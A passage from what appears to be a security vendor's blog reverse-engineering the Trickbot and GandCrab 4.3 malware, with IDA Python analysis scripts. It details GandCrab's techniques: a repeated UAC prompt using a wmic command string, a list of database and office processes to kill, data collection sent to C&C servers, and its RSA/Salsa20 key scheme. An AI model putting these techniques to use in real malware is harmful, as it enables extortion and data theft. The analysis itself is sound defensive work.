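    return base64.b64decode(standard_text)


def encode_custom_b64(data):
    """Inverse helper, only used here to build a demo input."""
    encoded = base64.b64encode(data).decode("ascii").rstrip("=")
    return encoded.translate(TO_CUSTOM)


scrambled = encode_custom_b64(b"kernel32.dll")
print(scrambled, "->", decode_custom_b64(scrambled))
```

For the real sample, the substitution table would have to be taken from the binary, and the extra bit operations would need to be reimplemented on top of this.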

The output looks like this (note that line breaks are not encoded, but do actually break the lines):

We can also adapt our algorithm to print the import address table, since we know the structure used in sub_40C8C0() to build the IAT:

> * Take the pointer at stru_42A058
> * Convert the values stored there into an array of the structure “IATstruct” (described previously) with eight array elements
> * For each of those eight elements:
>     * Decrypt the first DWORD as DLL name
>     * Iterate from second to third DWORD and decrypt them to get all imported functions
>     * Take the fourth DWORD as an offset where the function is placed on our IAT on the heap

Printing the IAT as a dictionary looks like this:

SETTING COMMENTS TO DECOMPILATION

One thing that always bugged me is that it is trivial to add comments in the disassembly in IDA. But since I use the decompiler a lot, I wanted to add my decrypted strings as comments in the decompiler view. After rather unsatisfying Google searches, I spent hours in IDA’s API documentation, read a bunch of existing IDA plugins to look for hints and tried out a lot. Turns out my IDA 6.9 is very crashy when working with IDA Python, and the documentation is not always as helpful as one would like it to be. But I finally succeeded with a lot of trial and error and a little bit of brute forcing:

First you need to translate the address of the disassembly to the function line of the decompiled code. Then by using a ctree object, you can place a comment there. Unfortunately, the ctree object needs to have the correct “item preciser” (ITP). An ITP specifies whether a comment is placed e.g. in a line of an “else”, “do”, “opening curly brace”, and so on. If you set an incorrect ITP on your ctree object, your comment is “orphaned” and won’t be placed correctly. I still do not understand how to know which ITP I should use, so I developed a little brute force algorithm:

> * Delete all orphaned comments from current function
> * For each possible ITP:
>     * Set comment with current ITP
>     * If no orphaned comment exists, break loop

This algorithm is rather stupid. But after spending too much time on this issue, I was finally happy to have something that works. The result looks like this:

SETTING FUNCTION INFORMATION

Being able to decrypt all strings and set them as comments in the decompiled code helps a lot when reversing the binary. What is missing is a properly usable IAT. We already know that the IAT is constructed during runtime on the heap. Function calls to the IAT look like this:

The first two lines of the decompilation look as follows in the disassembly:

You can see in the first line that dword_42A648 is copied to eax, and eight lines later the offset 0xBC is added, before a call to register ecx executes the WinAPI call. The last five lines show a second WinAPI call in a simpler fashion, with only one function argument. The mov instructions in lines five to eight are irrelevant for the function call, but the compiler decided to put them between the three pushes for the function arguments of the first call anyway.

The idea of how to fix this is quite simple. Yet, the implementation of the idea turned out to be way more complex: We write a lightweight implementation of a taint tracker and track the usage of dword_42A648, which holds a pointer to the IAT, to find all WinAPI calls. For each call, our taint tracking provides us with the offset within the IAT, so we know which WinAPI is called. In our previous example, we would start with eax, which gets a copy of dword_42A648. Then we track eax until it is copied to ecx with the offset 0xBC. Then we track ecx until we see a call to ecx. Thus we know that the IAT offset 0xBC is used at this specific call.

In order to tell IDA what kind of return value and parameters each IAT call has, we need to do some more magic. First, we need to import all function definitions we need. E.g. for “SetCurrentDirectoryW” we need to define a function like this: “typedef BOOL __stdcall SetCurrentDirectoryW(LPCWSTR lpPathName);”. We import those function definitions as local types in IDA. In the second step, we create a local structure which reflects our IAT. So instead of only naming the pointer e.g. “CreateThread”, we also use the type CreateThread, which we imported as a local type. This IAT structure is then applied to the address dword_42A648, so we can see which function is called when dword_42A648 is referenced. The decompilation of e.g. sub_402B00 then looks like this:

We can see three calls to WinAPIs and their corresponding names in lines 18, 31 and 34. Yet, neither is the number of function arguments correct, nor are their types identified properly. For example, in line 18 IDA shows five function arguments where there should be four, and in line 31 there is one where there should be three. Additionally, the structure PSECURITY_DESCRIPTOR is not set as the third argument in line 18; instead IDA set it to void*. And instead of LPSECURITY_ATTRIBUTES, IDA uses an int* in line 31.

In order to fix this, we can now leverage our taint tracking information and define each call with its corresponding function by using the IDA Python functions apply_callee_tinfo() and set_op_tinfo2() of the idaapi. This triggers IDA’s magic and propagates the added information to the disassembly, so that even stack variables are redefined and renamed.

We can now see that the function calls have the correct number of arguments as well as the correct types of arguments. Also the stack variables got redefined and renamed correctly.

You always know you are going down a very dark trail when the IDA Python functions you are using have fewer than 10 hits on Google and most of those hits are just copies of the same text. Yet, I found the existing IDA Python script “apply_callee_type.py” from Jay Smith on https://github.com/fireeye/flare-ida/blob/master/python/flare/apply_callee_type.py extremely helpful in understanding how to do such magic in IDA.

The final pseudo algorithm looks like this:

> * Iterate over the decrypted IAT and for each imported function:
>     * Look up function definition in IDA’s database
>     * Import function definition to local types for later use
> * Create IAT structure and import it as local type called “IAT”
> * Set dword_42A648 as type “IAT”
> * For each read-reference to dword_42A648:
>     * Get the register which holds dword_42A648
>     * Disassemble forward until the register is copied with an offset to a new register, remember the used offset
>     * Disassemble forward until the new register is called, remember this address
>     * Depending on the used offset, look up the function definition of the IAT function
>     * Apply function definition to current address
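The register tracking at the heart of this algorithm can be sketched outside of IDA. The following Python snippet is a strongly simplified model and not the script from the repository: instructions are plain tuples instead of IDA objects, only mov and call are interpreted (other instructions that overwrite a register are ignored), and the addresses in the demo are made up.

```python
IAT_GLOBAL = "dword_42A648"


def find_iat_calls(instructions):
    """Return {call_address: iat_offset} for a linear list of instructions.

    Each instruction is (address, mnemonic, dst, src). An operand is a
    register name, the name of the IAT global, or a (base_register, offset)
    tuple for a memory read such as [eax+0BCh].
    """
    holds_iat = set()   # locations currently holding the IAT base pointer
    holds_func = {}     # location -> IAT offset of the function loaded into it
    calls = {}
    for address, mnemonic, dst, src in instructions:
        if mnemonic == "mov":
            # Evaluate the source first, since dst may also be the base register.
            func_offset = None
            if isinstance(src, tuple) and src[0] in holds_iat:
                func_offset = src[1]
            elif src in holds_func:
                func_offset = holds_func[src]
            is_base = src == IAT_GLOBAL or src in holds_iat
            # Overwriting dst invalidates whatever we knew about it.
            holds_iat.discard(dst)
            holds_func.pop(dst, None)
            if is_base:
                holds_iat.add(dst)
            if func_offset is not None:
                holds_func[dst] = func_offset
        elif mnemonic == "call" and dst in holds_func:
            calls[address] = holds_func[dst]
    return calls


# Demo modelled on the example above: eax receives the IAT pointer, ecx is
# loaded from [eax+0BCh] and then called. Addresses are hypothetical.
demo = [
    (0x1000, "mov", "eax", IAT_GLOBAL),
    (0x1005, "push", "esi", None),
    (0x1006, "mov", "edx", "ebx"),
    (0x1008, "mov", "ecx", ("eax", 0xBC)),
    (0x100E, "call", "ecx", None),
]
for call_address, offset in find_iat_calls(demo).items():
    print(hex(call_address), "calls IAT offset", hex(offset))
```

A real implementation additionally has to cope with branches, further instruction types and direct calls through memory operands, which is where most of the complexity mentioned above comes from.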

CONCLUSION

In the first part we have learned how Trickbot obfuscates its strings and how we can leverage static code analysis in order to deobfuscate the strings and put them in a usable format in IDA. In the second part we analyzed how the dynamically created import address table of Trickbot can be restored and how IDA can be instrumented to process the data types of the imported functions to get a nice and clean decompilation result.

Finally, I would like to thank my colleagues from G DATA Advanced Analytics for proofreading this article. Additionally, I would like to thank the Trickbot authors for the interesting and partially challenging malware.

You can find the IDA Python scripts on https://github.com/GDATAAdvancedAnalytics/IDA-Python

Author Robert Michel

Posted on March 22, 2019

INTRODUCTION

GandCrab is a ransomware that has been around for over a year and has steadily altered (I explicitly do not say “improved”) its code. The author(s) version their builds; the version I analyzed in this blog post is GandCrab’s internal version 4.3 with the SHA-256 c9941b3fd655d04763721f266185454bef94461359642eec724d0cf3f198c988.

GandCrab has been around for a while, but gained relevance for us when we received incoming requests for incident response engagements, primarily from medium-sized companies. On the 24th of August 2018 GandCrab started to push some e-mail based campaigns against German-speaking countries, as already described by our esteemed colleague Hauke here https://www.gdata.de/blog/2018/09/31078-professionelle-ransomware-kampagne-greift-personalabteilungen-mit-bewerbungen-an (G DATA’s corporate blog is typically obfuscated in German).

In the meantime Bitdefender released a tool to decrypt several variants of GandCrab, including the analyzed one: https://labs.bitdefender.com/2018/10/gandcrab-ransomware-decryption-tool-available-for-free/ To the best of our knowledge, the tool does not use any flaw in the encryption of GandCrab, but it uses a copy of the master private key, which can be used to revert the whole encryption. Details on how the encryption is done by GandCrab can be found later on in this article.

MOTIVATION

We analyzed GandCrab as the need arose. When we started with the analysis, we had about zero knowledge of the internal details of GandCrab. This article is meant as a walkthrough of the analysis process, with some focus on the execution flow of GandCrab, as well as the analysis of the kernel driver exploit included in this sample. As we are documenting in retrospect, various blog posts on GandCrab already exist that document its features, tricks and oddities. You can find a very good feature comparison and timeline here: https://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/. An additional timeline, a few details about the kernel driver exploit added in version 4.2.1, as well as an explanation of the latest feature of each version can be found here: https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html

STARTING THE ANALYSIS

UNPACKING

The step of unpacking the sample will be skipped here, as it takes around 30 seconds if you have the correct setup and know what to expect in the unpacked form. At our first encounter with the sample, we didn’t know what to expect, so it took us a few minutes.

REMOVING THE JUNK CODE

When putting the sample into IDA, you are first greeted by a scrambled main function, which trips IDA up a bit. After rolling my eyes and being afraid I had not unpacked the sample properly, I looked at some random functions identified by IDA and noticed that most of the code looked readable, but several functions also had the same anti-disassembling trick. Hoping to see a cool VM packer or some advanced obfuscation tricks, I started to analyze the junk code, which starts at the first call in line number 3.

Obviously, the two conditional short jumps two instructions later point to a location which was not properly disassembled by IDA. After fixing the disassembly of the jump target, the code looks like this.

So, reading the disassembly, we have a call, which only pushes the return address on the stack. This return address, being the topmost stack element, is then increased by 0x11. In the next step, depending on the state of the ZF bit (or simply “zero flag”), either the JNZ or the JZ condition triggers and jumps to the pop eax, jmp eax instructions, which pop the altered return address from the stack and jump to it. Disassembling the jump target two bytes after the jump itself yields the following result:

We can see that the jmp eax leads us to the call to address 0x40414B. Since ExitProcess is called afterwards, we can assume that 0x40414B is the main function of GandCrab. Disassembling this function in IDA looks like this:

Well, we’ve seen this byte sequence at the function prologue somewhere before…
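The arithmetic behind the trick can be checked with a few lines of Python. This is only a sanity check under the assumption that the junk sequence is exactly the 22 bytes used in the patch script in this section; the start address is made up, and the mnemonics in the comments are my reading of the bytes.

```python
# The 22 junk bytes, split up by instruction.
JUNK = bytes.fromhex(
    "E8 00 00 00 00"   # call $+5: pushes the address of the next instruction
    "3E 83 04 24 11"   # add dword ptr ds:[esp], 11h
    "75 05 74 03"      # jnz / jz, both landing on the pop eax
    "E9 28 14"         # junk bytes that confuse the disassembler
    "58 FF E0"         # pop eax / jmp eax
    "00 E9"            # more junk
)


def jump_target(start):
    """Address reached by `jmp eax` if the sequence begins at `start`."""
    return_address = start + 5      # pushed by the 5-byte call
    return return_address + 0x11    # adjusted by the add on [esp]


# Short jumps are relative to the end of the 2-byte jump instruction.
jnz_target = 10 + 2 + JUNK[11]
jz_target = 12 + 2 + JUNK[13]

start = 0x401000  # hypothetical address of the junk sequence
print(hex(jump_target(start)), jump_target(start) - start, len(JUNK))
print(jnz_target, jz_target, hex(JUNK[jnz_target]))
```

Both conditional jumps end up on the pop eax, and the final jump lands directly behind the junk sequence, which is why overwriting all 22 bytes with NOPs does not change the behaviour of the code.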

In case you’re only reading the text and not really looking at the pictures, you might have missed that the function prologue does not only look the same for both functions we have seen so far, but is the very same byte sequence. Also, IDA did not notice that a new function starts at address 0x40414B, which is why it placed the “loc_40414B” label there. After succeeding in decompiling the function when simply NOPing out the junk instructions by hand, I wrote a short IDA Python script to patch all locations where the junk instructions were:

> import idaapi
> from idc import FindBinary, SEARCH_DOWN
>
> # Junk byte sequence found at the start of the obfuscated functions
> tmp = "E8 00 00 00 00 3E 83 04 24 11 75 05 74 03 E9 28 14 58 FF E0 00 E9"
> # One NOP (0x90) for each of the 22 junk bytes
> patchbytes = "\x90" * 22
>
> # Patched locations no longer match, so searching from 0 finds the next hit
> cur = FindBinary(0, SEARCH_DOWN, tmp)
> while cur != idaapi.BADADDR:
>     print hex(cur)
>     idaapi.patch_many_bytes(cur, patchbytes)
>     cur = FindBinary(0, SEARCH_DOWN, tmp)

The Python script prints each location where it patched something, so I could then check if IDA detected this location as the start of a function and test if I could decompile it. Of course, defining a function could also be done by a script, but for 29 functions, this was still doable by hand, and the IDA API is also not the most intuitive API to use when you’re in a bit of a hurry.

So yep, patching was rather trivial, as Fortinet confirmed: https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html

FOLLOWING THE EXECUTION FLOW

After the few small hurdles described before, we can start looking at GandCrab and analyze the execution flow step by step. Before doing so, here is a reference of what we’re going to see and which function calls which one. Since there will be a lot of function calls and returns, it is easy to get lost, so take this as a reference (maybe put it on a second screen, print it, open it in a second tab, …) while you’re reading the rest of this article:

> main
> ----Elevate Privileges
> ----closeRunningProcesses
> ----mainFunction
> --------bIsSystemLocaleNotOk
> --------bCheckMutex
> --------decryptPubKey
> --------0x00401C56
> --------0x00405B7D
> --------encRC4
> --------internetThread
> ------------0x004047BD
> ------------contactCnC
> --------startEncryption
> ------------decryptFileEndings
> ------------createRSAkeypair
> ------------saveKeysToRegOrGetExisting
> ----------------getKeypairFromRegistry
> ----------------encrypPubKey
> --------------------getRandomBytes
> --------------------importRSAkeyAndEncryptBuffer
> ----------------writeRegistryKeys
> ------------createUserfileOutput
> ------------concatUserInfoToRansomNote
> ------------startEncryptionsInThreads
> ----------------encryptNetworkThread
> --------------------enumNetworksAndEncrypt
> ------------------------loopFoldersAndEncrypt_wrapper
> ----------------------------loopFoldersAndEncrypt
> --------------------------------...
> ----------------prepareEncryption
> ----------------encryptLocalDriveThread
> --------------------loopFoldersAndEncrypt
> ------------------------0x0040512C
> ------------------------0x004053FD
> ------------------------0x00405525
> ------------------------encryptFile
> ----------------------------bIsFileEndingInBlacklist
> ----------------------------bIsFilenameOnBlacklist
> ----------------------------encryptionFunc
> --------------------------------...
> --------deleteShadowCopies
> ----AntiStealth
> ----deleteSelfWithTimeout

We’re beginning at what I call the main function at 0x0040414B. It starts very simply:

The first function call, to a function named “nullsub_1” by IDA, is, as the name already implies, nothing interesting:

Those kinds of functions are often generated by compilers if you remove the content of a function by preprocessor directives like “#ifdef DEBUG”. I suppose the author(s) of GandCrab placed either some debug string or a breakpoint there when compiling the debug version. Since we are looking at the release compilation, the function is empty.

ELEVATING PRIVILEGES

The next part of the main function is a simple check whether the sample is running on Windows Vista or newer. If so, GandCrab checks if the current process is running with integrity level low or even lower. If that is also the case, a cheap and simple trick is used to gain normal user privileges: By calling the WinAPI ShellExecuteW with “%windir%\system32\wbem\wmic” as “lpFile” parameter, “runas” as “lpVerb” parameter and “process call create \”cmd /c start %s\”” as “lpParameters”, GandCrab starts a process that asks the user to execute a command line with normal user privileges, which in turn starts GandCrab from the command line. After the new process is started, the initial process ends itself by calling ExitProcess(0).

As you can see in the first lines of the screenshot, GandCrab obfuscates the strings by filling the wchar array during runtime with _mov_ instructions. This is a well-known trick for string obfuscation.

Given the distribution methods of GandCrab, which also include exploit kits, this kind of functionality makes sense: Most exploit kits nowadays only deliver exploits to gain code execution via bugs in browsers or browser plugins. And all major browsers try to sandbox their worker processes in low or even zero privileged process containers. So, a successful exploit against a modern browser will initially run with low or zero integrity level, unless a second exploit is fired to elevate the process’s privileges. GandCrab goes the easy way: instead of firing a privilege escalation exploit, it simply asks the user for more privileges, but does this in a very sneaky way. Those user level (aka medium integrity) rights are needed to later encrypt the user’s files.

In the above screenshot you can see what happens if you run GandCrab on a German Windows 8 with low integrity: The UAC dialogue pops up. You might have noticed that the whole privilege escalation is wrapped in a loop with 100 tries, which makes it very dangerous for average users. You either have to click “No” 100 times, or you execute GandCrab with medium integrity.

ENSURING FILE ACCESS

So GandCrab either already has enough privileges, or it tries to start a new process with enough privileges with the user’s help. In any case the execution flow then goes back to the main function, where the next call to 0x00403F7D, a function which I named “closeRunningProcesses()”, takes place.

First, GandCrab fills an array, called _lpString1_ by IDA in the screenshot, with string pointers. Then, by using the _CreateToolhelp32Snapshot_ API with the _TH32CS_SNAPPROCESS_ flag, it iterates over all running processes and checks each process name against the list in the _lpString1_ array. Each matching process is opened and terminated, provided GandCrab gets the corresponding process handle.

The full list of process names is:

> msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlwriter.exe,
> oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe,
> agntsvc.exeisqlplussvc.exe, xfssvccon.exe, sqlservr.exe,
> mydesktopservice.exe, ocautoupds.exe, agntsvc.exeagntsvc.exe,
> agntsvc.exeencsvc.exe, firefoxconfig.exe, tbirdconfig.exe,
> mydesktopqos.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe,
> mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe,
> infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe,
> powerpnt.exe, steam.exe, sqlservr.exe, thebat.exe, thebat64.exe,
> thunderbird.exe, visio.exe, winword.exe, wordpad.exe

Using my favorite open source intelligence tool, called Google, and searching for some of those process names, you can find a list from a Cerber sample which did the very same thing around two years ago: https://www.bleepingcomputer.com/news/security/cerber-ransomware-switches-to-a-random-extension-and-ends-database-processes/ The only difference is that Cerber’s list has fewer entries. Yet, GandCrab seems to have copied the exact list. Even the order of items is nearly the same. GandCrab only added some entries at the end of the list.

The reason for this feature is as follows: Those processes might have open handles on important files, which might block GandCrab in getting a writeable handle on those files when trying to encrypt them. So it kills those processes to ensure it can access the files which otherwise might be blocked.

THE MAINFUNCTION

Once GandCrab has ensured that a bunch of processes have been killed, the execution flow goes from the main function to a function which I called mainFunction at 0x0040398C. It might not have been my brightest idea to name the first function “main” (0x0040414B) and one of the following sub-functions “mainFunction” (0x0040398C), but let’s stick with it for now. In this function most of the GandCrab functionality takes place: anti-debugging/emulator/sandbox tricks, gathering and sending telemetry to the C&C, threading, encryption, as well as taunting IT security companies.

As this function is a bit bigger, I cut the screenshots into parts to explain the single steps.

GANDCRAB DOES NOT LIKE EMULATORS AND SANDBOXES

We start with a simple anti-emulator/sandbox trick: By calling OpenProcess() with invalid arguments, and subsequently checking the error code, GandCrab ensures that no one is fiddling with the OpenProcess API. Some simple emulators or sandboxes might always return “success” and will thus not set the expected error code, which is probably what this part is trying to detect.

GANDCRAB IS AFRAID OF RUSSIANS AND CYRILLIC KEYBOARDS

In bIsSystemLocaleNotOk() at 0x00403528, GandCrab checks whether a Russian keyboard is installed, or whether the system’s default UI language is on the internal blacklist. In both cases GandCrab stops its execution and deletes itself from the system by calling deleteSelfWithTimeout() at 0x004032CE.

THERE CAN BE ONLY ONE GANDCRAB

The next check in bCheckMutex() at 0x00403092 tries to prevent several instances of GandCrab from running at the same time. By creating a named mutex via CreateMutexW() and subsequently checking for the error codes ERROR_ACCESS_DENIED and ERROR_ALREADY_EXISTS, it ensures that the mutex is created and the function fails if the mutex already exists.

With the mutex name, GandCrab starts its first taunt against Ahnlab. According to https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html, the text in the picture behind the link in the string buffer translates to “_I added you to my gay list. I used a pencil for the time being_”. Since I don’t speak Russian, you have to take Fortinet’s word for the translation.

SHIPPING ITS OWN PUBLIC KEY

With the next call to decryptPubKey() at 0x004038DA, a public key stored in the .data section is decrypted. The decrypted key is put on heap memory and the pointer to the memory is stored in a global variable for later use.

The public key is first XORed with 5 and afterwards decrypted with the Salsa20 stream cipher. The decryption key for the stream cipher is a greeting to the inventor of the Salsa20 algorithm, Daniel Bernstein, who is also addressed by his Twitter handle @hashbreaker.

IM IN UR MACHINE, STEALING UR INFOZ

In the next two subsequent calls to 0x00401C56 and 0x00405B7D (not shown in any screenshot), GandCrab initializes an internal structure and then fills it with information about the current system. Most of the data in this structure is organized in groups of three. The first element is a boolean value set during initialization of the structure which controls if the next two elements are used. Those next two elements are a static name set during initialization and a value calculated during runtime (think of it like a key/value pair in JSON). E.g.

> DWORD bShouldFillDomainName; //set to 0/1 during initialization
> DWORD pc_group; //static name
> DWORD domainName; //calculated during runtime

By using this format, GandCrab can read the following information from the target computer, if configured to do so:

* User Name
* Computer Name
* Domain Name
* Installed AV Product
* Keyboard Locale
* Windows Product Name
* Processor Architecture
* Volume Serial Number
* CPU Name (as defined in HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0)
* Type of each attached drive (as defined by GetDriveTypeW())
* Free disk space of each attached drive

Additionally, a “ransom_id” is calculated by computing ntdll.RtlComputeCrc32() over the CPU name with 666 as the initial CRC, transforming this DWORD into a string and then concatenating the volume serial number of the volume on which Windows is installed.

The whole structure of stolen information is then serialized into a string in the form of “key1=value1&key2=value2” and then two IDs are added, as well as the version information. Afterwards the whole string is encrypted with RC4 and the static key “jopochlen” in 0x00404B66, which I called encRC4.

In between those string concatenation functions, you can see another taunt directed at Ahnlab: GandCrab claims to have a possible write-what-where kernel exploit with a privilege escalation for their security suite Ahnlab V3 Lite. You can read about the analysis of this exploit later in this article.
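The serialization and encryption step described above can be sketched in a few lines of Python. RC4 is implemented by hand here since it is not part of the standard library. Only the key “jopochlen”, the “key=value&key=value” form and the name “pc_group” come from the analysis; the other field name, all values and the ASCII encoding are assumptions for illustration.

```python
def rc4(key, data):
    """Plain RC4: key scheduling followed by the keystream XOR."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def serialize(fields):
    """Join (name, value) pairs into the key1=value1&key2=value2 form."""
    return "&".join("{}={}".format(name, value) for name, value in fields)


KEY = b"jopochlen"  # static key seen in encRC4

# "pc_group" appears in the structure above; "pc_name" and both values
# are hypothetical.
fields = [("pc_name", "DESKTOP-1"), ("pc_group", "WORKGROUP")]
payload = serialize(fields).encode("ascii")
encrypted = rc4(KEY, payload)
print(payload)
print(encrypted.hex())
```

Since RC4 is symmetric, running the same function with the same key over captured data yields the serialized string again, which is handy when looking at the C&C traffic.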

GANDCRAB HOME PHONE

Once the information about the infected system has been gathered, a thread is started which pushes this information to the C&C server, starting at 0x004048D7, called internetThread(). This part is rather weird, but very effective with regard to network-based IDS/IPS as well as sinkholing attacks against the C&Cs of GandCrab.

It starts with GandCrab decrypting a huge char array with the previously seen XOR algorithm. As this blob is huge, I’m not showing it here. It contains 960 different domains and IPs separated by semicolons. For each of those domains/IPs the function 0x004047BD is called. In this function, several randomized strings are generated, which form a random path for the C&C URI.
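Decoding such a blob offline is straightforward. The following Python sketch assumes that the “previously seen XOR algorithm” is a single-byte XOR with 5, as for the public key, and that the decoded blob is plain ASCII; both are assumptions, and the hosts in the demo are placeholders instead of entries from the real list.

```python
def xor_decode(blob, key=5):
    """XOR every byte with a single-byte key (assumed to be 5)."""
    return bytes(b ^ key for b in blob)


def split_hosts(decoded):
    """Split the decoded blob at semicolons, dropping empty entries."""
    return [host for host in decoded.decode("ascii").split(";") if host]


# Build a made-up "encrypted" blob; XOR is its own inverse.
encoded = xor_decode(b"example.com;192.0.2.1;example.org")
hosts = split_hosts(xor_decode(encoded))
print(len(hosts), hosts)
```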

The first random string is one of those seven. The seed of the randomness is based on GetTickCount(). The second random string is chosen from one of the eight strings shown

above.

The third string is built in a slightly more complex way. From a pool of 16 two-char strings, one is chosen randomly. Then, depending on further random numbers, between zero and five more times a random string from the same pool is concatenated. The result is later used as file name in the URL’s path. The fourth and last random string is one of the four file name extensions shown above (since the char* array from the first random string is re-used for the fourth random string, the offset starts at 3 instead of 0, which looks odd in the screenshot). Then, with the call to wsprintfW(), the URL is built and the function contactCnC() at 0x00404682 is called, which ultimately sends the gathered system information to the C&C server. In contactCnC() there is not too much interesting to show. The already serialized and RC4 encrypted system information is accessed via a global variable (which is why you can’t see it as an argument in the above screenshot) and is then base64 encoded before being transmitted.
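The construction of the third string implies a simple structural property that can be checked on observed URLs: the file name consists of one to six two-char pieces from the pool. The following is a small sketch of that rule. The pool contents here are a made-up stand-in (the real 16 strings are only visible in the screenshot), and Python’s random module replaces the GetTickCount()-seeded generator of the malware.

```python
import random

# Hypothetical stand-in for the 16 two-char strings; NOT the real pool.
POOL = [a + b for a in "ab" for b in "cdefghij"]


def build_file_name(rng: random.Random) -> str:
    """One mandatory piece plus zero to five additional pieces."""
    extra = rng.randint(0, 5)
    return "".join(rng.choice(POOL) for _ in range(1 + extra))


def could_be_generated(name: str) -> bool:
    """Check whether a file name fits the 1..6 pieces-from-pool pattern."""
    if len(name) % 2 != 0 or not 2 <= len(name) <= 12:
        return False
    return all(name[i:i + 2] in POOL for i in range(0, len(name), 2))
```

With the real pool filled in, could_be_generated() could serve as one weak signal among others; on its own it would match plenty of benign file names.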

Before sending the information to the C&C server as multipart/form-data in a POST request, GandCrab first contacts the domain with a GET request to decide, based on the HTTP status code (30x), whether the server should be contacted with HTTP or HTTPS. What GandCrab does is actually easy to describe, but it poses a few problems for defenders and analysts. Most of the domains/IPs contacted by GandCrab are benign websites from real companies or organizations. So, I assume that GandCrab either sneaked at least one of their C&C domains/IPs in there, or GandCrab compromised one of those legit websites to receive C&C traffic. We have not followed up on that aspect so far.

By sending the stolen information to several hundred domains/IPs, GandCrab makes it hard to block the C&C communication based on domains/IPs, because you would block a lot of benign websites, too. If you use a network-based IDS/IPS, it is also not trivial to detect or block GandCrab traffic based on the URL, since there are a lot of randomizations in there and it is not easy to tell those URLs apart from legit URLs.

ENCRYPT ALL THE THINGS!

After starting the thread that calls the C&C server, the mainFunction() initializes three critical sections, of which only one is used at all.

Then, with a call to the function startEncryption() at 0x00402E60 the actual encryption of files on the system starts. In the first call to decryptFileEndings() at 0x00402E14 a list of file endings is decrypted with the already known XOR loop. This list is later used to exclude files from encryption based on their file ending.

The excluded file endings are:

> .ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .lock .hlp .ldf .icl
> .icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu
> .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack
> .exe .bat .cmd .gandcrab .KRAB .CRAB .zerophage_i_like_your_pictures

As a second step in createRSAkeypair() at 0x00404BF6, a 2048 bit RSA keypair is created. This keypair is then passed to the function I called saveKeysToRegOrGetExisting() at 0x00402B85. There are two branches here: If the registry path “HKCU\SOFTWARE\keys_data\data” exists, the previously generated keypair is thrown away – WTF? Why generate it in the first place? – and the registry keys “private” and “public” are read from said path via getKeypairFromRegistry() at 0x0040298D and used further on. Please note that the registry value “private” does not only hold the private key, but a slightly more complex buffer, as you can see when looking at the second branch.

The second branch is executed if the registry path does not exist. A call to encrypPubKey() at 0x00402263 is executed. First a random IV and a random key are generated – getRandomBytes() uses advapi32.CryptGenRandom(), so it is probably really random and not some pseudo random rand() function. Those two random values are then used to encrypt the private key with Salsa20.

The function importRSAkeyAndEncryptBuffer() imports a public RSA key and uses it to encrypt the provided buffer. Note that it is not the previously generated public key that is used here, but g_Mem_pubkey, which was decrypted in the beginning of the main function. In order to understand what is actually encrypted by importRSAkeyAndEncryptBuffer() it is important to know what the structure behind the outBuf pointer looks like, so here is my IDA Local Type definition:

> #pragma pack(1)
> struct keypairBuffer
> {
> DWORD privkeySize;
> char salsaKey;
> char IV;
> char privKey;
> }

You can now see that all 0x100 bytes starting at keypairBuffer->salsaKey and all 0x100 bytes of keypairBuffer->IV are encrypted. Although the key is only 32 bytes and the IV only 8 bytes long, as you can see from the first argument of getRandomBytes(), GandCrab still encrypts the whole buffer, including lots of unused null bytes.

¯\_(ツ)_/¯

Yet, this means that without the private key of the embedded g_Mem_pubkey, you cannot decrypt the Salsa20 key and IV. And without this Salsa20 key and the IV, you cannot decrypt the locally generated private RSA key.
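To make the layout of keypairBuffer more tangible, here is a minimal sketch that splits such a buffer into its fields. It assumes the field sizes implied by the text (a little-endian DWORD, then 0x100 bytes each for the encrypted Salsa20 key and IV, then privkeySize bytes of encrypted private key); parse_keypair_buffer() is a name of my own choosing and the sketch does not decrypt anything.

```python
import struct

KEY_FIELD_SIZE = 0x100  # assumption: RSA-encrypted Salsa20 key field
IV_FIELD_SIZE = 0x100   # assumption: RSA-encrypted IV field


def parse_keypair_buffer(buf: bytes) -> dict:
    """Split a packed keypairBuffer into its still-encrypted fields."""
    (privkey_size,) = struct.unpack_from("<I", buf, 0)
    offset = 4
    salsa_key = buf[offset:offset + KEY_FIELD_SIZE]
    offset += KEY_FIELD_SIZE
    iv = buf[offset:offset + IV_FIELD_SIZE]
    offset += IV_FIELD_SIZE
    priv_key = buf[offset:offset + privkey_size]
    if len(priv_key) != privkey_size:
        raise ValueError("buffer is shorter than privkeySize claims")
    return {
        "privkey_size": privkey_size,
        "enc_salsa_key": salsa_key,
        "enc_iv": iv,
        "enc_priv_key": priv_key,
    }
```

Applied to the base64-decoded “GANDCRAB KEY” part of a ransom note, this would only separate the pieces; without the private key belonging to g_Mem_pubkey they stay opaque.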

Unfortunately, this looks like solid use of cryptography to me.

Then, with a call to writeRegistryKeys() at 0x00402AAD, the public key of the previously generated RSA keypair is written to the registry key “public” and the whole encrypted keypairBuffer structure is written to the registry key called “private” in the above mentioned registry path.

Back in the startEncryption() function, as a next step the memory of the generated private RSA key is freed in order to avoid having it in clear text in memory during runtime. Then, with a call to createUserfileOutput() at 0x004023CF, a part of the GandCrab ransom note is generated. The encrypted keypairBuffer is base64 encoded and, by using a global variable, the RC4 encrypted and base64 encoded system data previously generated in the mainFunction() are concatenated with the following strings:

> ---BEGIN GANDCRAB KEY---
>
> ---END GANDCRAB KEY---
> ---BEGIN PC DATA---
>
> ---END PC DATA---

